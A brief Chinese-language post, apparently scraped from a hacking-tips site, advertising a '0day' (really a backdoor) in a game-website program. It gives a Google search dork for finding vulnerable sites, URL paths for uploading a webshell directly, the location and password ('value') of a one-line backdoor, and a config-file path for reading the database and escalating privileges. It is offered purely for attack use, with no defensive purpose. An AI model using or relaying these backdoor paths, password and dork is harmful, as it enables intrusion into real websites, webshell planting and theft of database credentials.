游戏网站程序0DAY -电脑资料

    准确点应该算是backdoor

    inurl:Find.asp 您的位置 >> 客服中心 >> 找回密码

    直接传马:

    http://www.xxxx.net/user/situjiaduotu2.asp

    一句话backdoor  ,密码 : value

    http://www.xxxx.net/htmledit/Include/upfile_class.asp

    http://www.xxxx.net/htmledit\Include\DeCode.asp

    读库提权:

    D:\web\www.xxx.net\Inc\Config.asp